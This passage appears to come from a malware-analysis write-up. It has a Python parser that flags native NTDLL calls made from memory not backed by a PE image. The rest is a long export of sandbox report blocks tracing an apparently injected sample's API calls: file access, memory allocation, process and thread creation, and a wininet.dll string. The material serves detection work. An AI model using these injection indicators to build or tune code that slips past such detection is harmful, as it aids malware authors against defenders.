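• NtCreateFile.NTDLL(00000060,00000000,.z`,000A3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000A3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000A861D
Memory Dump Source
• Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
APIs
• NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000A86C5
Memory Dump Source
• Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
APIs
• NtClose.NTDLL(@=,?,?,000A3D40,00000000,FFFFFFFF), ref: 000A8725
Memory Dump Source
• Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00092D11,00002000,00003000,00000004), ref: 000A87E9
Memory Dump Source
• Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
APIs
Memory Dump Source
• Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
"""

# One API call line: "• Name.MODULE(args), ref: <hex call site>"
API_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# The dump a function block was disassembled from, with the PE-backing verdict.
SRC_RE = re.compile(
    r"^•\s*Source File:\s*(?P<dump>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)
HEX_FIELD = re.compile(r"[0-9A-Fa-f]+")


def parse_dump_name(name):
    """Split a .sdmp name into its dotted fields.

    Field order is an ASSUMPTION inferred from the names on this page:
    process index, phase, record id, base address, then two fields the page
    does not explain, which are returned raw rather than interpreted."""
    if not name.endswith(".sdmp"):
        raise ValueError("not a dump name: %s" % name)
    fields = name[:-5].split(".")
    if len(fields) != 6 or not all(HEX_FIELD.fullmatch(f) for f in fields):
        raise ValueError("unexpected dump name layout: %s" % name)
    return {
        "process": int(fields[0]),
        "phase": int(fields[1]),
        "record": int(fields[2]),
        "base": int(fields[3], 16),
        "raw_tail": (fields[4], fields[5]),
    }


def parse_report(text):
    """Group API calls by the dump their function block was taken from.

    Each block lists its APIs before its Memory Dump Source, so calls are
    buffered until the Source File line that closes the block is seen."""
    regions = {}
    pending = []
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            pending.append((m["api"], m["module"], int(m["ref"], 16)))
            continue
        m = SRC_RE.match(line)
        if m:
            region = regions.setdefault(
                m["dump"],
                {"offset": int(m["offset"], 16), "pe_backed": m["pe"] == "true", "calls": []},
            )
            region["calls"].extend(pending)
            pending = []
    return regions


def unbacked_nt_calls(regions):
    """Native (Nt*/Zw*) calls whose call site is in memory the sandbox could
    not map to a PE image, in order of appearance: (dump, api, call site)."""
    hits = []
    for dump, region in regions.items():
        if region["pe_backed"]:
            continue
        for api, module, ref in region["calls"]:
            if module.upper() == "NTDLL" and api.startswith(("Nt", "Zw")):
                hits.append((dump, api, ref))
    return hits


if __name__ == "__main__":
    for dump, api, ref in unbacked_nt_calls(parse_report(SAMPLE_REPORT)):
        info = parse_dump_name(dump)
        print("process %d: %s called from %08X, region base %08X, no PE backing"
              % (info["process"], api, ref, info["base"]))
```

Run stand-alone it prints the four flagged calls; pointed at a full report export, the same two patterns pick up every function block, because the Opcode ID, Instruction ID and fuzzy-hash lines match neither of them.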

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                              • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                              • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                              • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                              • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                              • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                              • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                              • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                              • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                              • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                               Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                               • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp
                                                               • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp
                                                               • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp
                                                               • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp
                                                               • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp
                                                               • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp
                                                               • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                               Uniqueness Score: -1.00%

                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 000A7398
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                               Uniqueness Score: -1.00%

                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 000A7398
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                               Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00093B93), ref: 000A890D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: .z`
                                                              • API String ID: 3298025750-1441809116
                                                               Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(&5,?,000A3C9F,000A3C9F,?,000A3526,?,?,?,?,?,00000000,00000000,?), ref: 000A88CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: &5
                                                              • API String ID: 1279760036-2170931432
                                                               Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00093B93), ref: 000A890D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: .z`
                                                              • API String ID: 3298025750-1441809116
                                                               Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000972DA
                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000972FB
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                               Uniqueness Score: -1.00%

                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00099BA2
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                               Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000A89A4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                               Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000A89A4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                               Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009CCE0,?,?), ref: 000A745C
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                               Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009CCE0,?,?), ref: 000A745C
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                               Uniqueness Score: -1.00%

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0009CFB2,0009CFB2,?,00000000,?,?), ref: 000A8A70
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
